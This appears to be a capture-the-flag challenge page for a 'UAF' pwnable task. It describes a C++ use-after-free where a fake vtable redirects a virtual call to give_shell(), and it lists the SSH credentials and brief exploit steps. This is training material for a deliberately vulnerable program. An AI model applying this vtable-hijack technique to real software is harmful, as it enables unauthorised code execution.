← BACK TO CHALLENGES
PWNABLE

UAF

Use After Free
350
POINTS
DESCRIPTION
The program has two C++ classes (Man, Woman) with virtual functions. When an object is deleted, its heap chunk is freed but the pointer still exists. By reallocating same-sized chunks with controlled data, you overwrite the freed vtable. Craft a fake vtable that puts give_shell() as the first entry - then call the virtual method.
HOW TO CONNECT
SSH into the challenge server: Host: pwnable.kr Port: 2222 User: uaf Pass: guest Command: ssh [email protected] -p2222 Exploit steps: cat uaf.cpp nm uaf | grep give_shell python3 -c "import struct; open('/tmp/fake','wb').write(struct.pack('<Q', ADDR+16))" ./uaf 8 /tmp/fake
ssh [email protected] -p2222
SUBMIT FLAG
Login or register to submit flags and earn points.
Flags are found on the challenge server after successful exploitation.